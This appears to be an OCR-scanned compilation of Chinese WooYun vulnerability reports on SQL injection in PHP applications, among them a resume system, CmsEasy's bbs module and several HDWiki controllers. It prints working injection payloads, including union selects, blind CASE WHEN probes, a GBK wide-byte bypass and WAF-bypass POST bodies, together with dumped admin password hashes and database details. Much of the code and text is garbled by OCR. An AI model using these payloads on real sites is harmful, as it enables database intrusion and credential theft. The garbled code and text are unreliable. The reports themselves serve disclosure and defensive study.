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function info_action(){ 
if($_POST["submitBtn"]){ 
$_POST=$this->post_trim($_POST) ; 
if($_POST["name"]=="") { 
$this ->obj ->ACT_msg("index.php?C=info", "6666666616: 
j 
if($_POST["city"]==""){ 


$this ->obj ->ACT_msg("index.php?C=info", "6666666 ; JÔ! 


j 
if($this->config['user_idcard' ]=="1") 
{ 
if($_POST["idcard"]==""){ 
$this->obj->ACT_ msg("index.php?C-info", 49 49 61 
j 
j 


if($ POST["cityid"]--"")( 
$this-»0bj-»ACT msg("index.php?C-info", "6606 6661( 
} 
if($ POST["address"]==""){ 
$this->obj->ACT_msg("index.php?c=info", "66p 96666 
} 
unset($ POST["submitBtn"]); 
$this->obj->delfiledir("../upload/tel/".$this->uid); 
$where["uid" ]=$this->uid; 


$nid=$this->obj ->update_once("resume", $_POST, $where); 


= = 32 








最 后 update once 的 时候 直接 把 $_ POST 带 入 ， 然 后 再 处 理 数组 ， 而 且 想 到 如 果 不 
使 用 等 号 ， 就 能 绕 过 WAF， 于 是 就 使 用 反 引 号 闭合 来 注入 : 


火狐 插件 提交 语句 为 : 


name-123123&sex-6&birthday-1988-01-01&marriage-8&height-&nationalil 
‘| 3 








也 可 以 使 用 burp 提 交 : 


name=123123&sex=6&bir thday=1988 -01-01&mar riage=8&height=&nationalil 
i ewig 


~ 这 里 就 绕 过 了 WAF 限 制 ~~ 





漏洞 证明 


看 看 效果 : 
VERSION 


座机 : 
* 电 子 邮 件 : “123eaa. com 
EE: NE ~ 
* 现 居住 地 : ”吉林 ~ KĒ - AWE ~ 
* 工 作 经 验 : ” 应 届 毕 业 生 v 
* 详 细 地 址 : dsfsdfdsfsdf 
个 人 主页 /博客 : 
—Bgua: 552 





www.wooyun.org 


数据 库 路 径 : 





* 教 育 程度 : 

* 现 居住 地 : 

* 工 作 经验 : 

* 详 细 地 址 : 

个 人 主页 /博客 : 
一 句 简 介 : 


数据 库 用 户 : 


* 电 子 邮件 : 

* 教 育 程度 : 

* 现 居住 地 : 

* 工 作 经 验 : 

* 详 细 地 址 : 
个 人 主页 /博客 : 
一 句 简介 : 


WooYun-2014-60166 : 云 人 才 系 统 S 


TR ~ 


吉林 M 
RB AS ~ 


dsfsdfdsfsdf 


D:XProgramData MySQL MySQL Server 5. 5\Data\ 


图 保存 


www.wooyun.org 


testtest@testtest. com 


ABR ~ 


吉林 ~， 长春 M 
应 届 毕 业 生 v 


dsfsdfdsfsdf 


root@localhost 


图 保存 


注入 ， 绕 过 WAF 


www.wooyun.org 


WooYun-2014-66221 : Cmseasy SQL 注射 漏洞 之 


— 


漏洞 作者 : NOXXX 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-066221 


简要 描述 
EA © © 
详细 说 明 
bbs 中 发 文章 的 时 候 直接 把 POST 数据 带 入 拼接 sq| 功 能 函数 中 导致 注入 
/bbs/add-archive.php 30 行 
if($id = $archive->inserData($_POST) ){ 
直接 带 入 整个 $_ POST 
/bbs/model/db/base.php 38 行 


public function inserData($data) { 
$r = $this->odb->insert($this->tblName, $data); //#3RA 
if($r) 
return $this->odb->getInsertId(); 
else 


return false; 


/bbs/commonlib/db.php 


public function insert($table, $data) 


{ 
$sql = $this->getInsertString($table,，$data);// 拼 接 Sql] AAA 


return $this-»execSql($sq1); 








public function getInsertString($table, $data) 


{ 
Sie sie = ku: 
Svist —a 
$table = $this->filterString($table); 
foreach ($data as $k => $v)//MARE ”因为 穿 过 来 的 是 整个 $_POST 
{ 
$n_str .= $this->filterString($k).','; 
$v str .= "'",.$this-»filterstring($v)."',"; 
j 
Sn str = preg-replace( "/,$/", "". $n_str ); 
$v str - preg replace( "/,$/", "", $v str ); 
$str = 'INSERT INTO '.$table.' ('.$n str.') VALUES( ' .$v. sti 
return $str; 
j 


SSS 





public function filterString($str) 


{ 
if ($this->magic_quotes) 
{ 
$str = stripslashes($str); 
j 
if ( is numeric($str) ) { 
return $str; 
} else { 
$ret = @mysqli_real_escape_string($this->con, $str); 
if ( strlen($str) && !isset($ret) ) { 
$r = $this->checkConnection(); 
if ($r !== true) { 
$this->closeDB(); 
$ret = $str; 
} 
} 
return $ret; 
} 
} 


过 滤 也 没什么 用 因为 没 过 滤 关 键 一 些 语句 

里 面 还 有 一 个 360safe.php 的 脚本 但 是 这 个 并 不 过 滤 键 名 只 过 滤 键 值 

还 有 一 个 变量 名 中 的 点 和 空格 被 转换 成 下 划 线 。 不 过 不 用 空格 也 是 可 以 的 。。 
exp: 

.../PHP/CmsEasy/bbs/add-archive.php?cid=1 

(POST) 


title=a&content)values(1, 
(SELECT(CONCAT(USERNAME,0x7c,PASSWORD))FROM(cmseasy_user)WHE 
RE(USERID%3D1)))#=c&submit=a&verify=HKCX 


漏洞 征明 
mysql 日 志 : 


2070 Query INSERT INTO cmseasy_bbs_archive (title,content)values(1, 
(SELECT(CONCAT(USERNAME,0x7c,PASSWORD))FROM(cmseasy_user)WHE 
RE(USERID=1)))#,username,userid,ip,addtime) 

VALUES (‘a’,'c',123213','4','...','1403698291') 

INT v| = @ SQL- XSS- Encryptiony Encoding- Other- 

=) Load URL  |http://127.0.0.1/PHP/CmsEasy/bbs/add-archive.php?cid- 1 


























$ Split URL 
» Execute 
[V] Enable Post data Enable Referrer 
ost data titleca&content)values(1,(SELECT(CONCAT(USERNAME,0x7c,PASSWORD))FROM(cmseasy. user) WHERE(USERID%3D1)))#=c&submit=a&verify¥=HKCX 
自行 填写 验证 码 
提交 评 


www.wooyun.org 


论 PHP 常见 漏洞 


) Split URL 
J Execute 





[V] Enable Post data | | Enable Referrer 
‘ost data title=a&content)values(1,(SELECT(CONCAT(USERNAME,0x7c,PASSWORD))FROM(cmseasy_user) WHERE(USERID963D1))) - c&submit-a&verify-HKCX| 











TM 


-MSeCcdas5y 加 入 收藏 - ESIR - S 


Serve for Creating value 


网 站 首页 论坛 首页 


= 


y 








添加 成 功 自动 转 跳 
admin|4297144b13955235245b2497399d7a93 


WWW.Wooyun.org 


修复 方案 


不 要 把 $_POST 提 交 过 去 。。 
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处 SQL 注入 漏洞 〈 人 钨 之 前 处 理 不 当 安 全 的 漏洞 ) 


< 
漏洞 作者 : ' 雨 。 V 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-088004 
简要 描述 

看 到 更 新 了 , 有 几 个 老 洞 还 没 修复 也 随便 放 到 这 里 面 来 说 了 。 
详细 说 明 

0x01 在 control/comment.php 中 


function doreport(){ 
$usernames=array(); 


$id=intval($this->post['id']) ? $this->post['id'] : 0; 


$report=trim(htmlspecialchars(WIKI_CHARSET==GBK?string: 


if(empty($id)||empty($report) ){ 
$this->message(-1,'',2); 
} 
$users=$ ENV["user"]-»get users('groupid',4); 
if(!(bool)$users)( 
$this-»message(-2,'',2); 
selse{ 
foreach($users as $user) { 


$usernames[]-S$user['username']; 


: hic 


$sendto-join(',',$usernames); 
$subject-$this-»view-»1lang['commentReportObj']; 
if($this->user['uid']=='0'){ 
$from=$this->ip; 
selse{ 
$from=$this->user[ 'username' ]; 
j 
$comment-$this-»-db-»-fetch by field('comment','id',$id);// : 
if(!(bool)$comment ) { 
$this->message(-1,'',2); 
j 
$doc-$this-»db--fetch by field('doc','did',$comment['did']: 
$doc['title'] -htmlspecialchars(stripslashes($doc['title']. 
$report=$this ->view->Lang[ 'commentCom' ].$this->view->lang[ 
.$this->view->lang['commentCom'].$this->view->lang| 
.$this->view->lang['commentId'].$comment['id'].'<b1 
.$this->view->lang['commentContent '].$comment[ ' comr 
.$this->view->lang['commentReportReason'].$report;, 
$sendarray = array( 
'sendto'-»$sendto, 
'subject'-»$subject, 
‘content '=>$report,//#ARXA 
'isdraft'=>1, 
‘user '=>$this->user 
); 
$ ENV['pms']-»send ownmessage($sendarray); 


Eu 














function send_ownmessage($sendarray) { 
$pmsresult = true; 
$isdraft = ($sendarray['isdraft'] === 'on')? 1 : 0; 
$userinfo = $this->check_recipient($sendarray['sendto'],1), 
$num = count($userinfo); 
if($num > 0){ 
$pmsquery = "INSERT INTO ".DB TABLEPRE."pms ( from , fi 
for($i-0; $i«$num; $i++){ 
$pmsquery .= "('".$sendarray['user']['username']." 
j 
$pmsquery = substr($pmsquery,0,-1) . ';'; 


$pmsresult = $this-»db-»query($pmsquery); 


} 
return $pmsresult; 
J 
E — H8 





词 条 的 评论 ( 共 1 条 ) 返回 词 条 
xiaoyu 时 间 : 12-19 00:47 
test'// 我 们 随便 找 一 个 词 条 然后 我 们 自己 先 去 评论 一 条 这 里 评论 了 test 
// 然后 点 击 举报 看 看 执行 的 语句 INSERT INTO wiki pms (^from', from 
评论 内 容 : test' 这 里 出 库 了 。 
Kl — ES 
这 里 的 怎么 回 显 让 我 纠结 了 很 久 。 


INSERT INTO wiki_pms 
( from , fromid , drafts , toid , to , subject , message , time , new ) 
VALUES ('xiaoyu','2','0', 1','admin', ?F-i& 2€ JR E JE", Ae VE A : xiaoyu<br > 评论 时 


g 





间 : 12-19 00:47<br/> 评 论 ID : 8<br/> 评 论 词 条 名 : 
XİAOYUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
XXXxasd<br> 评 论 内 容 : test'<br/> 举 报 原 因 teet','1418921320',1) 


这 里 会 把 我 们 的 message 的 内 容 回 显 出 来 ,在 发 送 邮件 的 那里 。 这 里 是 发 给 了 管理 
员 但 是 我 们 的 发 件 箱 可 以 看 到 。 Ua duit de] T —Mime 和 new 都 是 不 会 显示 出 来 的 
而 且 hdwiki 没 mysql error 所 以 不 会 报错 。 二 次 注入 的 话 讶 注 会 很 麻烦 ,所 以 像 办 法 直 
接 出 数据 。 


INSERT INTO wiki_pms 

( from , fromid , drafts , toid , to , subject , message , time , new ) 
VALUES (xiaoyu','2','0','1"'admin',' 评 论 举 报 专用 ',' 评 论 作者 : xiaoyu<br> 评 论 时 
间 : 12-19 00:47<br/> 评 论 ID : 8<br/> 评 论 词 条 名 : a<br/> 评 论 内 容 : 

test 123,1,1)£«br/» 3& 4& 7$ F]teet','1418921320',1) 


评论 内 容 : test'* 123 mysql + 不 能 连接 字符 串 只 能 加 一 个 数字 。 加 字符 是 加 不 进去 
的 

一 开始 是 想 的 hex 但 是 hex 也 会 有 字符 。 然后 就 是 想 的 把 16 进 制 转换 成 10 进 制 

10 进 制 就 没 数字 了 撒 然后 完整 的 就 是 


mA 


评论 举报 
yu tconv (hex (substr (user 0), 1, 4)), 16, 10), 1, 1)# | 


举报 原因 


& 


举报 后 进入 自己 的 发 件 箱 
标题 收 件 人 时 间 

评论 举报 专用 admin 01-01 08:00 
1919905652 

转发 删除 关闭 


可 以 看 到 这 样 的 发 件 的 。 看 1919905652 这 个 转 16 进 制 得 726f6f74 然后 加 上 
Ox726f6f74 


再 把 HEX 编 码 回来 得 root 这 样 一 次 截取 的 字符 不 能 太 多 太 多 了 数字 太 大 会 报错 。 


0x02 control/doc.php 


function docheckrecipient(){ 

$sendto = $this->post['sendto']; 

if (WIKI_CHARSET == 'GBK')( 
$sendto = string: :hiconv($sendto, 'GBK', 'UTF-8',1);//4%4 

j 

$send = explode(',',$sendto); 

if(count($send)>10) { 
$this->message($this->view->lang['fullsend'],'',2); 

j 

$checkreturn = $ ENV['pms']-»check recipient($sendto,0); 

$message = ($checkreturn === true)? 'OK' : ($checkreturn. ' 


$this->message($message, '',2); 


CES 





function hiconv($str,$to='',$from='',$force=false) { 
if (empty($str)) return $str; 
if(!preg_match( '/[\x80-\xff]/', $str)) return $str; // is 
if(empty($to) ){ 
if ('utf-8' == strtolower (WIKI_CHARSET) ){ 


return $str; 


j 

$to-WIKI CHARSET; 
} 
if(empty($from))t 


$from = ('gbk'==strtolower($to)) ? 'utf-8':'gbk'; 


$to=strtolower($to); 
$from-strtolower($from); 
//$isutf8-preg match( '/^([Nx00-Nx7f] | [NXc0-Nxdf ] [\x80-\xb1 
$re = strlen($str) > 6 ? '/([NxeO-Nxef ] [Nx80-Nxbf ] (21) (2)7 
$isutf8 = preg match($re, $str); 
//$force = (substr($to, 0, 3) == 'utf') ? true : $force; 
if(!$force && $isutf8 && $to--'utf-8' ) return $str;//Zfor 
if(!$force && !$isutf8 && $to--'gbk' ) return $str; 
if (function exists('iconv'))( 
$str = iconv($from, $to, $str);//49 宽 字 节 绕 过 转 义 符 
jelse( 
require once(HDWIKI ROOT.'/lib/Chinese.class.php'); 
$ch = new chinese($from, $to); 
if('utf-8'==$from) { 
$str = addslashes($ch-»convert(stripslashes($str)): 
jelse( 


$str 


$ch->convert($str); 


} 


return $str; 


Me 





function check recipient($sendto, $type)t 
$userinfos - array(); 
$send = array unique(explode(',', $sendto));//i €4eii F 44k" 
sort($send); 
$num = count($send); 
$sendto = str_replace(",", "','", $sendto); 
$query = $this->db->query("SELECT username, uid FROM ".DB_T/ 
if($this->db->num_rows($query) == $num && $type !- 1)( 


return true; 


iA 





http://web/dan/hdwiki//index.php?pms-checkrecipient 


sendto=a%E9%8C%A6%27) or CASE WHEN(substr((select username from 
wiki user where uid=1) from 1 for 1) in (char(97))) THEN (1) ELSE (0) end limit 1# 


Ilbypassi£ 5 4) E ix3& 4] © 


97 对 应 的 是 a 当 第 一 位 是 a 的 时 候 返回 ok 


d Load URL http: //web/dan/hdwiki//index. php?pms-checkrecipient 
) Split URL + 


Execute 











vV] Enable Post data Enable Referrer 
Post data sendto-aNEGNGCWAGN2T) or CASE WHEN(substr((select username from wiki user where uid-1) from 1 for 1) : (char (97))) THEN (1) ELSE (0) end limit 1# 























该 XML 文件 并 未 包含 任何 关联 的 样式 信息 。 文 档 树 显示 如 下 。 


pee 








ib PHP 常见 漏洞 





c Load URL http: //web/dan/hdwiki//index. php?pms-checkrecipient E 





[V] Enable Post data [ Enable Referrer 


Post data sendto-aWEOGNSCWADN2T) or CASE WHEN(substr((select username from wiki user where uid-1) from 1 for 1) in (char (98)))|THEN (1) ELSE (0) end limit 1# = 
+ 

















该 XNL 文件 并 未 包含 任何 关联 的 样式 信息 。 文 档 树 显示 如 下 。 





一 《Toot> 
afp\’ ) or CASE WHEN(substr((select username from wiki user where uid-1) from 1 for 1) in (char(98))) THEN (1) ELSE (0) end 
limit 1# 用 户 不 存在 ! 
C/root? 





当 不 对 应 时 直接 错误 。 写 个 脚本 直接 跑 很 简单 的 判断 
0x03 control/doc.php 中 
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function dochangename(){ 

$ajaxtitle = trim($this-»post['newname']); 

if(string: :hstrtoupper (WIKI_CHARSET )=='GBK' ) { 
$ajaxtitle=string: :hiconv($ajaxtitle, 'gbk', 'utf-8', 'tri 

j 

$title-string::substring(string::stripscript($ ENV['doc']-: 

if(@!is_numeric($this->post['did'])){ 
$this->message("-1","",2); 

jelseif($ajaxtitle!-string::stripscript($ajaxtitle))( 
$this->message("-3","",2); 

Jelseif(!$title)[ 
$this->message("-4","",2); 

}elseif (@(bool)$this->db->fetch_by_field('doc', 'title', $til 
$this->message("-2","",2); 

selseif (@(bool)$this->db->fetch_by_field('synonym', 'srctit- 
$this-»message("-5","",2); 

jJelseif($ ENV['doc']-»change name($this-»post['did'],S$titl: 
$ ENV['synonym']-»synonym change doc($this-»post['did': 
/人 . 
if(1 == $this->setting['cloud_search']) { 

// =c 


$ ENV['search']-»cloud change(array('dids'-»$this-: 


E = 


这 个 跟 上 个 差不多 就 不 多 说 了 。 





0x04 control/edition.php 


function doremove(){ 
$did-isset($this-»post['did'])?$this-»post['did']:$this-»g« 
$eids-isset($this-»post['eid'])?$this-»post['eid']:array($! 
foreach($eids as $eid)( 
if(!is numeric($eid)&&!is numeric($did))( 
// 这 里 判断 是 不 是 数字 如 果 是 不 是 数字 的 话 直接 返回 错误 了 。 但 是 这 里 有 个 问题 是 当 : 


$this->message($this->view->lang['parameterError'], 


} 
$result-$ ENV['doc']-»remove edition($eids, $did);//#AAW 


ww 





function remove_edition($eid, $did=0) { 
if(is_array($eid) ){ 
$eid=implode(",",$eid); 


} 


$sql-"INSERT INTO ".DB TABLEPRE."recycle (type, keyword, cont 
$query=$this->db->query("SELECT * FROM ".DB TABLEPRE. "edit: 
$delete count - array(); 


while($edition=$this->db->fetch_array($query) ){ 
al -一 一 


pne 


epa Py T ntm from wiki pms where toid=1 and ODORE 
sry SELECT * FROM wiki edition WHERE eid IN (1) union select 1, 2,3, 4,5, 6, 7, 8, 9, 1C 


my pipes p SET ea m te = "11 和 die 我 的 HDWiki — Powered by HDWiki! 一 Mozilla Firefox 
sry wiki recycle (type, keyword, content, file, admini m = 

THO AEO SEM PREC BEG IAM Kha 
sry DELETE FROM wiki edition WHERE eid IN (1) union select 1, = = 一 & i S Q = As u = 
sry UPDATE wiki doc SET editions=editions-1, visible=1 WHERE | 2#twovini - Fow- x |Elltestun ore | de e| Contiene |) 
sry SELECT author, auihorid. “time FROM wiki edition WHERE d| 4& @ (7 web/dan/hawiki/index. php cg 
sry UPDATE wiki doc SET lasteditor = author, lasteditorid = a} — pe "T E emi 
ery SELECT * ,eid FROM wiki edition WHERE did= ORDER BY eid B 访问 最 多 |) EasyTalk Administras $ 90sec 信 息 安全 小 组 KA Exploit- 
it INT Y= $ SQL XSS- Encryption" Encoding: Üther- 
nect root@localhost on 
sry SET character set connection-gbk, character set results- 
:ry SET sql_mode= ’ 
it DB  hdwiki 
sry SELECT * FROM wiki plugin ORDER BY pluginid ASC 
sry select u.*, g.* from wiki user u,wiki usergroup g where 
srw SRIRCT did FROM wiki antasave WHERE nid = 71° NRDFR RY +i 






















i 








4 —Load|VURL http: //web/dan/hdwiki /index. php?edition-remove 
ai Ù Split URL 


» Execute 





四 Enable Post data Enable Referrer 
Post data eid=1) union select 1,2,3, 4,5,6, T, 8,9, 10, 11, 12, 13, 14, 15, 16,1 

















0x05 1&8 control/edition.php 


function doexcellent(){ 
foreach(@$this->post['eid'] as $eid){ 
if(!is_numeric($eid) ){//—#¥ #4) & f aR 


$this->message($this->view->lang['parameterError'], 


} 
$result=$ ENV['doc']-»set excellent edition($this-»post['e: 


| ——''iü e Ü(À£ 





function set excellent edition($eid,$type-1)([ 
if(is_array($eid) ){ 
$eid=implode(",",$eid); 
j 
$type-(bool)$type?1:0; 


$this->db->query("UPDATE ".DB TABLEPRE."edition SET excelle 


return true; 





跟 上 面 个 差不多 不 多 说 了 。 
0x06 control/doc.php 中 


function docreate(){ 
if(4 != $this->user['groupid'] && ($this->time-$this->user | 
$this ->message($this->view->lang[ 'editTimeLimit1'].$th: 
j 
if($this->setting['verify_doc'] == -1) { // 首 次 编辑 审核 
if($this->setting['max newdocs'] != © && $this-»user['r 


$this->message(' 您 的 首次 可 创建 或 编辑 词 条 数 的 数量 已 达 最 大 但 


} 
if($this->setting['checkcode']!=3 && $this->setting['doc verificat: 


$this->message($this->view->lang['codeError'], ' BACI 


j 

if(@trim($this->post[ 'content'])==''[ [email protected]: 
$this->message($this->view->lang['contentIsNull'], 

j 


$doc['title']-string::substring(string::stripscript($ 上 
这 里 大 概 的 意思 是 假如 说 一 段 代码 截取 4 个 字符 那么 我 们 就 提交 一 个 aaa' 然后 转 义 成 aa 
$ doc-$this-»db-»fetch by field('doc','title',$doc['ti! 
if((bool)$ doc && !empty($_doc['content'])){ 
$this->message($this->view->lang['createDocTip5'], 
j 
if(!(bool)$ ENV['category']-»vilid category(S$this-»pos! 
$this->message($this->view->lang[ 'categoryNotExist 
j 
if((bool)$this->post['summary']){ 
$doc['summary']-trim(strip tags($ ENV['doc']-»repl: 
j 
$doc['did']-intval($this-»post['did']); 
$doc['letter']zstring::getfirstletter($this-»post['tit. 
$doc[ 'category']=$this->post['category']; 
//$doc['tags']-$ ENV['doc']-»jointags($this-»post['tag: 
$doc['tags']-$this-»post['tags']; 


$doc['tags']-$ ENV['doc']-»replace danger word($doc['t: 


$doc['tags'] = htmlspecialchars(string: :stripscript ($d¢ 
$doc['content'] = $_ENV[ 'doc']->replace_danger_word($tt 
$doc['content'] = preg replace('/(«embed.*?(?:allowscr: 
$doc['content'] = preg replace('/(«embed(?:(?!allowscr: 
$doc['content'] - addslashes(string::stripscript(strip: 
$doc['content'] = $this-»setting['auto picture']?$ ENV| 
$doc['summary'] = trim(strip tags($ ENV['doc']-»replac: 
$doc['summary'] = (bool)$doc['summary']?$doc['summary': 
$doc['summary'] - trim(string::convercharacter(string: 
$doc['summary'] - htmlspecialchars(addslashes(stripsla: 
$doc[ 'images' ]=util::getimagesnum($doc[ 'content']); 
$doc['time']-$this-»time; 
$doc['words']zstring::hstrlen($doc['content']); 
$doc['visible']-$this-»setting['verify doc'] != 0 ? 'O 
if(strpos($this->user['regulars'], 'doc-immunity') === 
if(!$ ENV['doc']-»check submit interval($this-»use! 
if($this->setting['save_spam']) { 
$doc['visible'] = 0; 
) else f 


$this->message(sprintf($this->view->lang[': 


j 
if(!$ ENV['doc']-»check eng pcnt($doc['content']) 
if($this->setting['save_spam']) { 
$doc['visible'] = 0; 
} else { 


$this->message($this->view->lang[ 'spam_msg 


j 
if(strpos($this->user['regulars'], 'doc-immunity') !== 


$doc['visible'] = 1; 


j 
if($this->setting['verify_doc'] == -1) ( // 首 次 编辑 审核 
if($this->user['newdocs'] != -1) { 
$_ENV[ 'user' ]->update_newdocs($this->user[ 'uid 
j 
j 


if($doc['visible'] -- 1)( 
$_ENV[ 'user']->add_credit($this->user['uid'], 'doc-« 
j 
/*foreach($this->post['tags'] as $search tags)( 
$doc['search tags'] .-string::convert to unicode($: 
Joy 
$did-$ ENV['doc']-»add doc($doc);//3X BRE 带 入 入 库 入 库 了 
$ ENV['user']-»update field('creates',$this-»user['cre: 
<code>function add doc($doc) { 
$editions = ($this->base->setting[ 'base_createdoc ' ]==1)?1:( 
$doc['title'] = trim($doc['title']); 
if ($doc['did'])( 
$this->db->query("REPLACE INTO ".DB TABLEPRE."doc 
(did,letter,title,tag ,summary ,content, author, authoric 


VALUES (".$doc['did'].", '".$doc['letter']."', '".$doc['! 


'" $this->base->user['username']."','".$this->base->use 
".$doc['time'].",".$doc['time'].", '".$this-»-base-»user| 
$did - $doc['did']; 
$this->db->query("DELETE FROM ".DB TABLEPRE."autosave Y 
jelse( 
$this->db->query("INSERT INTO ".DB TABLEPRE."doc 
(letter,title,tag ,summary ,content,author,authorid, tir 
VALUES ('".$doc['letter']."','".$doc['title']."','".$d 
'" $this->base->user['username']."','".$this->base->us¢ 
".$doc['time'].",".$doc['time'].", '".$this-»-base-»user| 
$did = $this->db->insert_id(); 
$this->add_doc_category($did, $doc['category']); 
$this->db->query("DELETE FROM ".DB TABLEPRE."autosave Y 
} 
if($this->base->setting[ 'base_createdoc' ]==1) { 
$this->db->query("INSERT INTO ".DB_TABLEPRE. "edition 
(did, author, authorid, time, ip, title, tag, summary, content, 
VALUES ($did, '".$this->base->user['username']."', '".$tl 


'".$doc['time']."','".$this->base->ip."','".$doc['titl]t 


} 
return $did; 
} 
加 __ 





$doc['title']."","".$doc['tags'] 刚好 这 截取 字符 的 后 面 跟 的 是 一 个 post 来 的 那么 就 可 以 
注入 了 。 


后 面 看 了 下 这 个 洞 竟然 被 提交 过 了 http://**.**.**.**/bugs/wooyun-2010-081667 
但 是 我 觉得 xxx 牛 给 的 利用 很 不 完美 啊 。 至 少 在 我 这 个 版 本 /* 是 不 成 功 的 


在 php 中 / 能 直接 注释 掉 后 面 的 东西 但 是 /mysgl 很 多 版 本 都 需要 在 后 面 接 /才能 注释 掉 
一 开始 我 也 在 这 语句 上 纠结 了 很 久 我 们 先 来 看 一 下 这 个 语句 
REPLACE INTO wiki_doc 


(did,letter,title,tag ,summary 
,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions) 


VALUES 
(56,X'，XiaOyUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
xxxxxxxxxxxasdV ,'user(),1,1,1,1,1,1,1,127,'asd','«sp»asd«br /></p>", 


'xiaoyu','2', 

1418925356,1418925356,'xiaoyu','2',"'1",0) 

是 这 样 的 他 换行 了 。 就 是 因为 这 个 换行 让 人 有 蛋 疼 。 

首先 我 们 知道 # -- 都 是 单行 注释 这 个 多 行 注释 / 在 mysq/ 中 又 需要 接 / 

后 面 的 我 们 是 不 可 控 的 所 以 也 没 办 法 利用 这 里 我 们 还 是 得 来 接 我 们 的 单行 注释 
一 共 14 个 column 换行 了 后 的 有 8 个 column 所 以 我 们 前 面 需要 接 6 个 column 


56,'X','XiaoyUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
xxxxxxxxxxasdV,' 这 里 是 三 个 所 以 我 们 构造 一 下 


56,'X','Xiaoy UX09990000000000000000000000000000000000000000000000000000000X 
xxxxxxxxxxasdV,',1,1,1 这 样 就 是 6 个 了 。 在 1 后 面 还 需要 构造 一 个 , 为 的 就 是 和 下 面 
换行 了 的 连接 起 来 然后 再 注释 择 这 一 行 后 面 的 那么 最 终 语句 就 是 


REPLACE INTO wiki_doc 


(did, letter,title,tag ,Summary 
,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions) 


VALUES 
(56,'X','XiAOyUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
xXXXXXXXXXXasd\',',concat(user(),0x23,version()),user(),(select 
concat(username,0x2c,password) from wiki user where uid=1),#','asd',<p>asd<br 
/></p>， 


'xiaoyu','2', 

1418925356,1418925356,'xiaoyu',2',1',0) 
POST /dan/hdwiki/index.php?doc-create HTTP/1.1 
Host: web 


User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 F: 


Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;¢ 
Accept-Language: zh-cn,zh;q=0.8, en-us; q=0.5,en; q=0.3 
Accept-Encoding: gzip, deflate 

Proxy-Connection: keep-alive 

Referer: http://web/dan/hdwiki/index.php?doc-create 

Cookie: ECS[visit_times]=6; themeIndexTom=2; KT-GUID-KT-C3DD75C569t 
Content-Type: multipart/form-data; boundary------------------------ 
Content-Length: 1534 

—— E 41184676334 

Content-Disposition: form-data; name="did" 

56 

e 41184676334 

Content-Disposition: form-data; name="section_id" 

bea aee e E dice 41184676334 


Content-Disposition: form-data; name="create_submit" 


Jasso ee eee sec eee 41184676334 

Content-Disposition: form-data; name="title" 
XiaO0yUXDXDOO0O000000000000000000000000000000000000000000000000000O0000 
下 41184676334 


Content-Disposition: form-data; name="category" 


uae ccce e E 41184676334 
Content-Disposition: form-data; name-z"content" 
<p>asd<br /></p> 

Ve ee eR enn E ces 41184676334 


Content-Disposition: form-data; name="letter" 


iesu Gee pee ee LEER EE 41184676334 
Content-Disposition: form-data; name="tags" 
,concat(user(),0x23, version()),user(), (select concat(username, 0x2c, 
dos ee aoe eee I uM E MS 41184676334 
Content-Disposition: form-data; name="code" 
————ÓÁ—Á—M 41184676334 
Content-Disposition: form-data; name="publishsubmit" 
:à2? 

————————— 41184676334- - 
Content-Disposition: form-data; name="tags" 
,user(),user(),user(),user(),1,1,1,1,1,1,1)# 
——————— eens 491299511942 
Content-Disposition: form-data; name="code" 

wi ee een anne 491299511942 
Content-Disposition: form-data; name="publishsubmit" 


‘a2? 


IE 491299511942- - 





成 功 执行 。 


LE] 二 于 六 | DN JX 
我 的 HIYiki DAH >> 和 帮助 立 档 


x 1aOyUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX! am 


标签 : root@localhost#5.1.28-re-community-log 编辑 /添加 标签 ”设置 顶 [0] 分 享 到 vv RFP (0) 编辑 梧 条 H 


词 条 首 字母 





admin, Tfef6171469e80d32c0558f88b377245 x: 
一 如 果 您 认为 本 词 条 还 有 竺 完善， 请 编辑 问 条 上 一 篇 asd 下 一 篇 3 
直接 出 数据 。 


0x07 control/pms.php t 


function doblacklist(){ 
if(isset($this->post['blacklist'])){ 
$blacklist = htmlspecialchars(string: :stripscript($this 
if(empty($blacklist) ){ 
$result = $ ENV['pms']-»remove blacklist($this-»us: 
selse{ 


$result = $ ENV['pms']-»add blacklist($blacklist, $1 
1 F 





function add_blacklist($blacklist, $uid) { 
return($this->db->query("REPLACE INTO ".DB_TABLEPRE. "black: 
}// 入 库 
到 — — Ji 





function dobox(){ 

$this->get[3] = empty($this->get[3]) ? NULL : $this->get[3- 

$page = max(1,isset($this->get[4]) ? $this->get[4] : $this- 

$num = isset($this->setting['list_prepage'])?$this->settinc 
$start_limit = ($page - 1) * $num; 

$count = $ ENV['pms']->get_totalpms($this->user['uid'], $tl 

‘| ee 








function get_blacklist($uid) { 
$user = $this->db->fetch_first("SELECT blacklist FROM ".DB 


return $user['blacklist']; 


而 IE 





$blackuser = str_replace(",","','",$blacklist); 
if ($group) { 
$sqladd = ($group == 'owner') ? 'AND og-0' : '/ 


} 


$query = "SELECT COUNT(*) num FROM ".DB TABLEPRE. "[ 





: , mw we Fee 热门 搜索 : HDwiki 协作 者 Wiki 与 BBS Wiki Wiki 
admin ) union select user order by id desc) 


3Y areaorder ASC 








BRBUHDWiki > 短 消息 > BRA 


b 个 人 管理 忽略 列表 
admin’) union select user() order by id desc) 


Pre 


这 个 老 洞 也 没 修复 http://**.**.**.**/bugs/wooyun-2010-067410 试 试 修复 了 把 。 


Hey i] LE PA 


FH 二 六 = =~ 一 人 
我 的 HIWYiki >> 所 属 分 类 >> 和 帮助 立 档 


X 1aOyUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX. = 





标签 : root@localhost#5.1.28-re-community-log 编辑 /添加 标签 ”设置 Tn [0] 分 享 到 ~ | 发 表 评论 (0) H 
词 条 首 字母 

admin, Tfef6171469e80d32c0559f88b377245 Lxx 
